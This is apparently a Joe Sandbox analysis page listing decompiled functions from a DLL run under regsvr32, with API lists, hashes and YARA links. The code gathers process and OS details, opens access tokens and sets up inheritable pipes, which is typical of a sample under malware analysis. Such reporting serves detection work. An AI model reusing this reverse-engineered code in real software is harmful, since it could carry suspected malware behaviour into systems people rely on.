				_push(_a8);
				_push(_t26);
				L10012285();
				_t40 = _t12;
				if(_t40 < 0 || _t40 >= _a8) {
					L19:
					_t13 = _t12 | 0xffffffff;
					goto L20;
				} else {
					L100122CD();
					_t15 =  *((intOrPtr*)( *_t12));
					if(_t15 != 0x2e) {
						_t24 = strchr(_t26, _t15);
						if(_t24 != 0) {
							 *_t24 = 0x2e;
						}
					}
					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
						L11:
						_t43 = strchr(_t26, 0x65);
						_t28 = _t43;
						if(_t43 == 0) {
							L18:
							_t13 = _t40;
							L20:
							return _t13;
						}
						_t45 = _t43 + 1;
						_t29 = _t28 + 2;
						if( *_t45 == 0x2d) {
							_t45 = _t29;
						}
						while( *_t29 == 0x30) {
							_t29 = _t29 + 1;
						}
						if(_t29 != _t45) {
							E10008706(_t45, _t29, _t40 - _t29 + _a4);
							_t40 = _t40 + _t45 - _t29;
						}
						goto L18;
					} else {
						_t6 = _t40 + 3; // 0x100109b2
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L19;
						}
						_t26[_t40] = 0x302e;
						( &(_t26[2]))[_t40] = 0;
						_t40 = _t40 + 2;
						goto L11;
					}
				}
			}














        0x10012125
        0x1001212a
        0x1001212e
        0x1001212e
        0x10012133
        0x10012138
        0x10012139
        0x1001213c
        0x1001213d
        0x10012142
        0x10012145
        0x10012146
        0x1001214b
        0x10012152
        0x100121f8
        0x100121f8
        0x00000000
        0x10012161
        0x10012161
        0x10012168
        0x1001216c
        0x10012173
        0x1001217c
        0x1001217e
        0x1001217e
        0x1001217c
        0x1001218d
        0x100121b3
        0x100121bc
        0x100121be
        0x100121c4
        0x100121f3
        0x100121f3
        0x100121fb
        0x100121fe
        0x100121fe
        0x100121c6
        0x100121c7
        0x100121cd
        0x100121cf
        0x100121cf
        0x100121d4
        0x100121d3
        0x100121d3
        0x100121db
        0x100121e7
        0x100121f1
        0x100121f1
        0x00000000
        0x1001219d
        0x1001219d
        0x1001219d
        0x100121a3
        0x00000000
        0x00000000
        0x100121a5
        0x100121ab
        0x100121b0
        0x00000000
        0x100121b0
        0x1001218d

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp Download File
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: strchr$_snprintflocaleconv
        • String ID: %.*g
        • API String ID: 1910550357-952554281
        • Opcode ID: c4e2036c81f1f18131b8e055db18669b76aa49e64ef9a1be148b7d3467e3c398
        • Instruction ID: 8636af6e6c8ef7ea176c693fecce787b547d9a6025bf48258b91e4e7d6eda4ac
        • Opcode Fuzzy Hash: c4e2036c81f1f18131b8e055db18669b76aa49e64ef9a1be148b7d3467e3c398
        • Instruction Fuzzy Hash: 562138FA6046567AD311CA689CC6B5E3BDCDF15260F250115FE509E182E674ECF483A0
        Uniqueness

        Uniqueness Score: -1.00%

        Function 100102B2, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON
        Download Yara Rule
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp Download File
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: _snprintfqsort
        • String ID: %I64d$false$null$true
        • API String ID: 756996078-4285102228
        • Opcode ID: 27ee6084afeff88239f383b3bb26a63d700df7a8d62648484173ceb74af6d73e
        • Instruction ID: b3da69db5d3f4e878d7882629df3b6b2364259ca5c53272952ed0c313758977d
        • Opcode Fuzzy Hash: 27ee6084afeff88239f383b3bb26a63d700df7a8d62648484173ceb74af6d73e
        • Instruction Fuzzy Hash: BCE150B1A0024ABBDF11DE64CC45EEF3BA9EF45384F108015FD549E141EBB5EAE19BA0
        Uniqueness

        Uniqueness Score: -1.00%

        Function 10004A0B, Relevance: 9.3, APIs: 6, Instructions: 285stringCOMMON
        Download Yara Rule
        C-Code - Quality: 79%
        			E10004A0B(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
				char _v516;
				void _v1044;
				char _v1076;
				signed int _v1080;
				signed int _v1096;
				WCHAR* _v1100;
				intOrPtr _v1104;
				signed int _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				char _v1144;
				char _v1148;
				void* __esi;
				intOrPtr _t66;
				intOrPtr _t73;
				signed int _t75;
				intOrPtr _t76;
				signed int _t81;
				WCHAR* _t87;
				void* _t89;
				signed int _t90;
				signed int _t91;
				signed int _t93;
				signed int _t94;
				WCHAR* _t96;
				intOrPtr _t106;
				intOrPtr _t107;
				void* _t108;
				intOrPtr _t109;
				signed char _t116;
				WCHAR* _t118;
				void* _t122;
				signed int _t123;
				intOrPtr _t125;
				void* _t128;
				void* _t129;
				WCHAR* _t130;
				void* _t134;
				void* _t141;
				void* _t143;
				WCHAR* _t145;
				signed int _t153;
				void* _t154;
				void* _t178;
				signed int _t180;
				void* _t181;
				void* _t183;
				void* _t187;
				signed int _t188;
				WCHAR* _t190;
				signed int _t191;
				signed int _t192;
				intOrPtr* _t194;
				signed int _t196;
				void* _t199;
				void* _t200;
				void* _t201;
				void* _t202;
				intOrPtr* _t203;
				void* _t208;

				_t208 = __fp0;
				_push(_t191);
				_t128 = __edx;
				_t187 = __ecx;
				_t192 = _t191 | 0xffffffff;
				memset( &_v1044, 0, 0x20c);
				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
				_v1108 = 1;
				if(_t187 != 0) {
					_t123 =  *0x1001e688; // 0x2120590
					_t125 =  *0x1001e68c; // 0x219fc68
					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
				}
				if(E1000BB8D(_t187) != 0) {
					L4:
					_t134 = _t128;
					_t66 = E1000B7A8(_t134,  &_v516);
					_push(_t134);
					_v1104 = _t66;
					E1000B67D(_t66,  &_v1076, _t206, _t208);
					_t129 = E100049C7( &_v1076,  &_v1076, _t206);
					_t141 = E1000D400( &_v1076, E1000C379( &_v1076), 0);
					E1000B88A(_t141,  &_v1100, _t208);
					_t175 =  &_v1076;
					_t73 = E10002C8F(_t187,  &_v1076, _t206, _t208);
					_v1112 = _t73;
					_t143 = _t141;
					if(_t73 != 0) {
						_push(0);
						_push(_t129);
						_push("\\");
						_t130 = E100092E5(_t73);
						_t200 = _t199 + 0x10;
						_t75 =  *0x1001e688; // 0x2120590
						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
							L12:
							__eflags = _v1108;
							if(__eflags != 0) {
								_t76 = E100091E3(_v1112);
								_t145 = _t130;
								 *0x1001e740 = _t76;
								 *0x1001e738 = E100091E3(_t145);
								L17:
								_push(_t145);
								_t188 = E10009B43( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100);
								_t201 = _t200 + 0x10;
								__eflags = _t188;
								if(_t188 == 0) {
									goto L41;
								}
								_push(0x1001b9ca);
								E10009F48(0xe);
								E10009F6C(_t188, _t208, _t130);
								_t194 = _a4;
								_v1096 = _v1096 & 0x00000000;
								_push(2);
								_v1100 =  *_t194;
								_push(8);
								_push( &_v1100);
								_t178 = 0xb;
								E1000A0AB(_t188, _t178, _t208);
								_t179 =  *(_t194 + 0x10);
								_t202 = _t201 + 0xc;
								__eflags =  *(_t194 + 0x10);
								if( *(_t194 + 0x10) != 0) {
									E1000A3ED(_t188, _t179, _t208);
								}
								_t180 =  *(_t194 + 0xc);
								__eflags = _t180;
								if(_t180 != 0) {
									E1000A3ED(_t188, _t180, _t208);
								}
								_t87 = E1000980C(0);
								_push(2);
								_v1100 = _t87;
								_t153 = _t188;
								_push(8);
								_v1096 = _t180;
								_push( &_v1100);
								_t181 = 2;
								_t89 = E1000A0AB(_t153, _t181, _t208);
								_t203 = _t202 + 0xc;
								__eflags = _v1108;
								if(_v1108 == 0) {
									_t153 =  *0x1001e688; // 0x2120590
									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
									if(__eflags != 0) {
										_t90 = E1000FC1F(_t89, _t181, _t208, 0, _t130, 0);
										_t203 = _t203 + 0xc;
										goto L26;
									}
									_t153 = _t153 + 0x228;
									goto L25;
								} else {
									_t91 =  *0x1001e688; // 0x2120590
									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
									if(__eflags != 0) {
										L32:
										__eflags =  *(_t91 + 0x1898) & 0x00000082;
										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
											_t183 = 0x64;
											E1000E23E(_t183);
										}
										E100052C0( &_v1076, _t208);
										_t190 = _a8;
										_t154 = _t153;
										__eflags = _t190;
										if(_t190 != 0) {
											_t94 =  *0x1001e688; // 0x2120590
											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
												lstrcpyW(_t190, _t130);
											} else {
												_t96 = E1000109A(_t154, 0x228);
												_v1100 = _t96;
												lstrcpyW(_t190, _t96);
												E100085D5( &_v1100);
												 *_t203 = "\"";
												lstrcatW(_t190, ??);
												lstrcatW(_t190, _t130);
												lstrcatW(_t190, "\"");
											}
										}
										_t93 = _a12;
										__eflags = _t93;
										if(_t93 != 0) {
											 *_t93 = _v1104;
										}
										_t192 = 0;
										__eflags = 0;
										goto L41;
									}
									_t51 = _t91 + 0x228; // 0x21207b8
									_t153 = _t51;
									L25:
									_t90 = E1000553F(_t153, _t130, __eflags);
									L26:
									__eflags = _t90;
									if(_t90 >= 0) {
										_t91 =  *0x1001e688; // 0x2120590
										goto L32;
									}
									_push(0xfffffffd);
									L6:
									_pop(_t192);
									goto L41;
								}
							}
							_t106 = E1000C292(_v1104, __eflags);
							_v1112 = _t106;
							_t107 =  *0x1001e684; // 0x219faa0
							_t108 =  *((intOrPtr*)(_t107 + 0xd0))(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
							__eflags = _t108 - _t192;
							if(_t108 != _t192) {
								_t109 =  *0x1001e684; // 0x219faa0
								 *((intOrPtr*)(_t109 + 0x30))();
								E1000861A( &_v1148, _t192);
								_t145 = _t108;
								goto L17;
							}
							E1000861A( &_v1144, _t192);
							_t81 = 1;
							goto L42;
						}
						_t116 =  *(_t75 + 0x1898);
						__eflags = _t116 & 0x00000004;
						if((_t116 & 0x00000004) == 0) {
							__eflags = _t116;
							if(_t116 != 0) {
								goto L12;
							}
							L11:
							E1000E286(_v1112, _t175);
							goto L12;
						}
						_v1080 = _v1080 & 0x00000000;
						_t118 = E100095E1(_t143, 0x879);
						_v1100 = _t118;
						_t175 = _t118;
						E1000BFEC(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
						E100085D5( &_v1100);
						_t200 = _t200 + 0x14;
						goto L11;
					}
					_push(0xfffffffe);
					goto L6;
				} else {
					_t122 = E10002BA4( &_v1044, _t192, 0x105);
					_t206 = _t122;
					if(_t122 == 0) {
						L41:
						_t81 = _t192;
						L42:
						return _t81;
					}
					goto L4;
				}
			}































































        0x10004a0b
        0x10004a18
        0x10004a23
        0x10004a28
        0x10004a2a
        0x10004a2d
        0x10004a32
        0x10004a35
        0x10004a3f
        0x10004a41
        0x10004a4e
        0x10004a57
        0x10004a57
        0x10004a64
        0x10004a7f
        0x10004a86
        0x10004a88
        0x10004a8d
        0x10004a92
        0x10004a98
        0x10004aa7
        0x10004ac6
        0x10004ac8
        0x10004ace
        0x10004ad4
        0x10004ad9
        0x10004add
        0x10004ae0
        0x10004aea
        0x10004aec
        0x10004aed
        0x10004af8
        0x10004afa
        0x10004afd
        0x10004b02
        0x10004b09
        0x10004b5e
        0x10004b5e
        0x10004b63
        0x10004bca
        0x10004bcf
        0x10004bd1
        0x10004bdb
        0x10004be0
        0x10004be0
        0x10004bfa
        0x10004bfc
        0x10004bff
        0x10004c01
        0x00000000
        0x00000000
        0x10004c07
        0x10004c11
        0x10004c1a
        0x10004c1f
        0x10004c22
        0x10004c28
        0x10004c2e
        0x10004c36
        0x10004c38
        0x10004c3b
        0x10004c3c
        0x10004c41
        0x10004c44
        0x10004c47
        0x10004c49
        0x10004c4d
        0x10004c4d
        0x10004c52
        0x10004c55
        0x10004c57
        0x10004c5b
        0x10004c5b
        0x10004c62
        0x10004c67
        0x10004c69
        0x10004c6d
        0x10004c6f
        0x10004c75
        0x10004c79
        0x10004c7c
        0x10004c7d
        0x10004c82
        0x10004c85
        0x10004c8a
        0x10004cb2
        0x10004cb8
        0x10004cbf
        0x10004cce
        0x10004cd3
        0x00000000
        0x10004cd3
        0x10004cc1
        0x00000000
        0x10004c8c
        0x10004c8c
        0x10004c91
        0x10004c98
        0x10004cdd
        0x10004cdd
        0x10004ce4
        0x10004ce8
        0x10004ce9
        0x10004ce9
        0x10004cf3
        0x10004cf8
        0x10004cfb
        0x10004cfc
        0x10004cfe
        0x10004d00
        0x10004d05
        0x10004d0c
        0x10004d4f
        0x10004d0e
        0x10004d13
        0x10004d1b
        0x10004d1f
        0x10004d2a
        0x10004d35
        0x10004d3d
        0x10004d41
        0x10004d49
        0x10004d49
        0x10004d0c
        0x10004d55
        0x10004d58
        0x10004d5a
        0x10004d60
        0x10004d60
        0x10004d62
        0x10004d62
        0x00000000
        0x10004d62
        0x10004c9a
        0x10004c9a
        0x10004ca0
        0x10004ca2
        0x10004ca7
        0x10004ca7
        0x10004ca9
        0x10004cd8
        0x00000000
        0x10004cd8
        0x10004cab
        0x10004ae4
        0x10004ae4
        0x00000000
        0x10004ae4
        0x10004c8a
        0x10004b69
        0x10004b77
        0x10004b8a
        0x10004b8f
        0x10004b95
        0x10004b97
        0x10004baf
        0x10004bb4
        0x10004bbd
        0x10004bc3
        0x00000000
        0x10004bc3
        0x10004b9f
        0x10004ba8
        0x00000000
        0x10004ba8
        0x10004b0b
        0x10004b11
        0x10004b13
        0x10004b51
        0x10004b53
        0x00000000
        0x00000000
        0x10004b55
        0x10004b59
        0x00000000
        0x10004b59
        0x10004b15
        0x10004b1f
        0x10004b2b
        0x10004b36
        0x10004b3d
        0x10004b47
        0x10004b4c
        0x00000000
        0x10004b4c
        0x10004ae2
        0x00000000
        0x10004a66
        0x10004a71
        0x10004a77
        0x10004a79
        0x10004d64
        0x10004d64
        0x10004d66
        0x10004d6c
        0x10004d6c
        0x00000000
        0x10004a79

        APIs
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp Download File
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: lstrcat$lstrcpy$memset
        • String ID:
        • API String ID: 1985475764-0
        • Opcode ID: 9c0abdd94eabe914945b90b3f23502be936d310f05b3141c419733170b2e759b
        • Instruction ID: f7566e60c9d6103eeec9fdfcf7230380432adf105638aba250afc4f9be1d7fc6
        • Opcode Fuzzy Hash: 9c0abdd94eabe914945b90b3f23502be936d310f05b3141c419733170b2e759b
        • Instruction Fuzzy Hash: 60919AB5604305AFF314DB20CC86F6E73E9EB84390F12492EF5958B299EF70E9448B56
        Uniqueness

        Uniqueness Score: -1.00%

        Function 1000D748, Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON
        Download Yara Rule
        APIs
        • SysAllocString.OLEAUT32(00000000), ref: 1000D75C
        • SysAllocString.OLEAUT32(?), ref: 1000D764
        • SysAllocString.OLEAUT32(00000000), ref: 1000D778
        • SysFreeString.OLEAUT32(?), ref: 1000D7F3
        • SysFreeString.OLEAUT32(?), ref: 1000D7F6
        • SysFreeString.OLEAUT32(?), ref: 1000D7FB
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp Download File
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: String$AllocFree
        • String ID:
        • API String ID: 344208780-0
        • Opcode ID: 29a52338a57cec81f6671dbadbd3888b240f1232313cc897351bf5da0bc70bfa
        • Instruction ID: 27e2c139421265cbd0753a0a77cd0a813644ebbf917d6f260799ceccbc4dcd54
        • Opcode Fuzzy Hash: 29a52338a57cec81f6671dbadbd3888b240f1232313cc897351bf5da0bc70bfa
        • Instruction Fuzzy Hash: BC21FB75900219BFDB01DFA5CC88DAFBBBDEF48294B10449AF505A7250EA71AE01CB60
        Uniqueness

        Uniqueness Score: -1.00%

        Function 100107F7, Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON
        Download Yara Rule
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp Download File
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID:
        • String ID: @$\u%04X$\u%04X\u%04X
        • API String ID: 0-2132903582
        • Opcode ID: 546ce5fa566931b67c5079da5f298430883b327ac1d9d5cea2f582d755a7ec14
        • Instruction ID: 18f8f7fd9c3af9e43ea2b41f69ba211a484cfe72345a25ce6a4dcd653cb28466
        • Opcode Fuzzy Hash: 546ce5fa566931b67c5079da5f298430883b327ac1d9d5cea2f582d755a7ec14
        • Instruction Fuzzy Hash: F1411932B04145A7EB24CA988DA5BAE3AA8DF44384F200115FDC6DE296D6F5CED1C7D1
        Uniqueness

        Uniqueness Score: -1.00%

        Function 100121FF, Relevance: 7.6, APIs: 5, Instructions: 52stringCOMMON
        Download Yara Rule
        C-Code - Quality: 79%
        			E100121FF(char* __eax, char** _a4, long long* _a8) {
				char* _v8;
				long long _v16;
				char* _t9;
				signed char _t11;
				char** _t19;
				char _t22;
				long long _t32;
				long long _t33;

				_t9 = __eax;
				L100122CD();
				_t19 = _a4;
				_t22 =  *__eax;
				if( *_t22 != 0x2e) {
					_t9 = strchr( *_t19, 0x2e);
					if(_t9 != 0) {
						 *_t9 =  *_t22;
					}
				}
				L10012291();
				 *_t9 =  *_t9 & 0x00000000;
				_t11 = strtod( *_t19,  &_v8);
				asm("fst qword [ebp-0xc]");
				_t32 =  *0x10018250;
				asm("fucomp st1");
				asm("fnstsw ax");
				if((_t11 & 0x00000044) != 0) {
					L5:
					st0 = _t32;
					L10012291();
					if( *_t11 != 0x22) {
						_t33 = _v16;
						goto L8;
					} else {
						return _t11 | 0xffffffff;
					}
				} else {
					_t33 =  *0x10018258;
					asm("fucomp st1");
					asm("fnstsw ax");
					if((_t11 & 0x00000044) != 0) {
						L8:
						 *_a8 = _t33;
						return 0;
					} else {
						goto L5;
					}
				}
			}











        0x100121ff
        0x10012207
        0x1001220c
        0x1001220f
        0x10012214
        0x1001221a
        0x10012223
        0x10012227
        0x10012227
        0x10012223
        0x10012229
        0x1001222e
        0x10012237
        0x1001223c
        0x1001223f
        0x10012248
        0x1001224a
        0x10012251
        0x10012262
        0x10012262
        0x10012264
        0x1001226c
        0x10012273
        0x00000000
        0x1001226e
        0x10012272
        0x10012272
        0x10012253
        0x10012253
        0x10012259
        0x1001225b
        0x10012260
        0x10012276
        0x10012279
        0x1001227e
        0x00000000
        0x00000000
        0x00000000
        0x10012260

        APIs
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp Download File
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: _errno$localeconvstrchrstrtod
        • String ID:
        • API String ID: 1035490122-0
        • Opcode ID: 92f26e4a364c3d80a29fdd1e2403d26020c0f2beabb2bc5ff205f5abd7f33c48
        • Instruction ID: a7fe3fef6b6346813f09e77c4cbf996122cf10ff1875fbe8eea6711f7156c08d
        • Opcode Fuzzy Hash: 92f26e4a364c3d80a29fdd1e2403d26020c0f2beabb2bc5ff205f5abd7f33c48
        • Instruction Fuzzy Hash: 5D0124B9900145FADB02AF20E90168D3BA4EF463A0F3141C0E9806E1A1CB75D9F4C7A0
        Uniqueness

        Uniqueness Score: -1.00%

        Function 1000CF84, Relevance: 7.5, APIs: 5, Instructions: 43COMMON
        Download Yara Rule
        C-Code - Quality: 94%
        			E1000CF84(void* __ecx) {
				intOrPtr _t11;
				long _t12;
				intOrPtr _t17;
				intOrPtr _t18;
				struct _OSVERSIONINFOA* _t29;

				_push(__ecx);
				_t29 =  *0x1001e688; // 0x2120590
				GetCurrentProcess();
				_t11 = E1000BA05();
				_t1 = _t29 + 0x1644; // 0x2121bd4
				_t25 = _t1;
				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
				_t12 = GetModuleFileNameW(0, _t1, 0x105);
				_t33 = _t12;
				if(_t12 != 0) {
					_t12 = E10008FBE(_t25, _t33);
				}
				_t3 = _t29 + 0x228; // 0x21207b8
				 *(_t29 + 0x1854) = _t12;
				 *((intOrPtr*)(_t29 + 0x434)) = E10008FBE(_t3, _t33);
				memset(_t29, 0, 0x9c);
				_t29->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t29);
				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
				_t17 = E1000E3B6(_t3);
				_t7 = _t29 + 0x220; // 0x21207b0
				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
				_t18 = E1000E3F1(_t7);
				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
				return _t18;
			}








        0x1000cf87
        0x1000cf89
        0x1000cf90
        0x1000cf98
        0x1000cfa2
        0x1000cfa2
        0x1000cfa8
        0x1000cfb1
        0x1000cfb7
        0x1000cfb9
        0x1000cfbd
        0x1000cfbd
        0x1000cfc2
        0x1000cfc8
        0x1000cfd8
        0x1000cfe2
        0x1000cfea
        0x1000cfed
        0x1000cff9
        0x1000cfff
        0x1000d004
        0x1000d00a
        0x1000d010
        0x1000d016
        0x1000d01e

        APIs
        • GetCurrentProcess.KERNEL32(?,?,02120590,?,10003545), ref: 1000CF90
        • GetModuleFileNameW.KERNEL32(00000000,02121BD4,00000105,?,?,02120590,?,10003545), ref: 1000CFB1
        • memset.MSVCRT ref: 1000CFE2
        • GetVersionExA.KERNEL32(02120590,02120590,?,10003545), ref: 1000CFED
        • GetCurrentProcessId.KERNEL32(?,10003545), ref: 1000CFF3
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp Download File
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: CurrentProcess$FileModuleNameVersionmemset
        • String ID:
        • API String ID: 3581039275-0
        • Opcode ID: c3299e6d2f0b03601ba1cf598394421de32a902fba2cc4fff372b1365d944c65
        • Instruction ID: 6868e59ac51cffefd4345363f154aaa4011aa3255cd34e47fa6660c1185ef8f7
        • Opcode Fuzzy Hash: c3299e6d2f0b03601ba1cf598394421de32a902fba2cc4fff372b1365d944c65
        • Instruction Fuzzy Hash: ED015E749017149BE720DF70888AAEABBE5FF95350F00082DF59687251EB74B744CB51
        Uniqueness

        Uniqueness Score: -1.00%

        Function 1000B946, Relevance: 7.5, APIs: 5, Instructions: 32threadCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E1000B946(void* __ecx) {
				void* _v8;
				void* _t9;

				if(OpenThreadToken(GetCurrentThread(), 8, 0,  &_v8) != 0 || GetLastError() == 0x3f0 && OpenProcessToken(GetCurrentProcess(), 8,  &_v8) != 0) {
					_t9 = _v8;
				} else {
					_t9 = 0;
				}
				return _t9;
			}





        0x1000b965
        0x1000b992
        0x1000b98e
        0x1000b98e
        0x1000b98e
        0x1000b997

        APIs
        • GetCurrentThread.KERNEL32(00000008,00000000,10000000,00000000,?,?,1000BA7C,74EC17D9,10000000), ref: 1000B959
        • OpenThreadToken.ADVAPI32(00000000,?,?,1000BA7C,74EC17D9,10000000), ref: 1000B960
        • GetLastError.KERNEL32(?,?,1000BA7C,74EC17D9,10000000), ref: 1000B967
        • GetCurrentProcess.KERNEL32(00000008,10000000,?,?,1000BA7C,74EC17D9,10000000), ref: 1000B980
        • OpenProcessToken.ADVAPI32(00000000,?,?,1000BA7C,74EC17D9,10000000), ref: 1000B987
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp Download File
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: CurrentOpenProcessThreadToken$ErrorLast
        • String ID:
        • API String ID: 102224034-0
        • Opcode ID: 84585c1d749f43a300b2851fef88a950c0520a77058640d0fe3f64d56e4382ed
        • Instruction ID: 5b563ac24429287b405df7abe271a8f453b302f4379ab1304781a3c6047c2fee
        • Opcode Fuzzy Hash: 84585c1d749f43a300b2851fef88a950c0520a77058640d0fe3f64d56e4382ed
        • Instruction Fuzzy Hash: 20F05E7150061AABFB41DFA48C49F5E73ACFB04280F018418F702D3054E670EF048761
        Uniqueness

        Uniqueness Score: -1.00%

        Function 1000A9B7, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177pipeCOMMON
        Download Yara Rule
        C-Code - Quality: 73%
        			E1000A9B7(signed int __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				signed int _v24;
				char _v28;
				char _v32;
				char _v36;
				struct _SECURITY_ATTRIBUTES _v48;
				intOrPtr _v60;
				char _v64;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				short _v92;
				intOrPtr _v96;
				void _v140;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr _t102;
				long _t111;
				intOrPtr _t115;
				intOrPtr _t126;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t130;

				_t111 = 0;
				_v24 = __ecx;
				_v12 = 0;
				_v20 = 0;
				_t127 = 0;
				_v8 = 0;
				_v16 = 0;
				_v48.nLength = 0xc;
				_v48.lpSecurityDescriptor = 0;
				_v48.bInheritHandle = 1;
				_v28 = 0;
				memset( &_v140, 0, 0x44);
				asm("stosd");
				_t130 = _t129 + 0xc;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
					L18:
					return 0;
				}
				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
					L13:
					E1000861A( &_v28, 0);
					if(_v20 != 0) {
						_t77 =  *0x1001e684; // 0x219faa0
						 *((intOrPtr*)(_t77 + 0x30))(_v20);
					}
					if(_v8 != 0) {
						_t115 =  *0x1001e684; // 0x219faa0
						 *((intOrPtr*)(_t115 + 0x30))(_v8);
					}
					return _t111;
				}
				_t79 = _v16;
				_v76 = _t79;
				_v80 = _t79;
				_v84 = _v12;
				_v140 = 0x44;
				_v96 = 0x101;
				_v92 = 0;
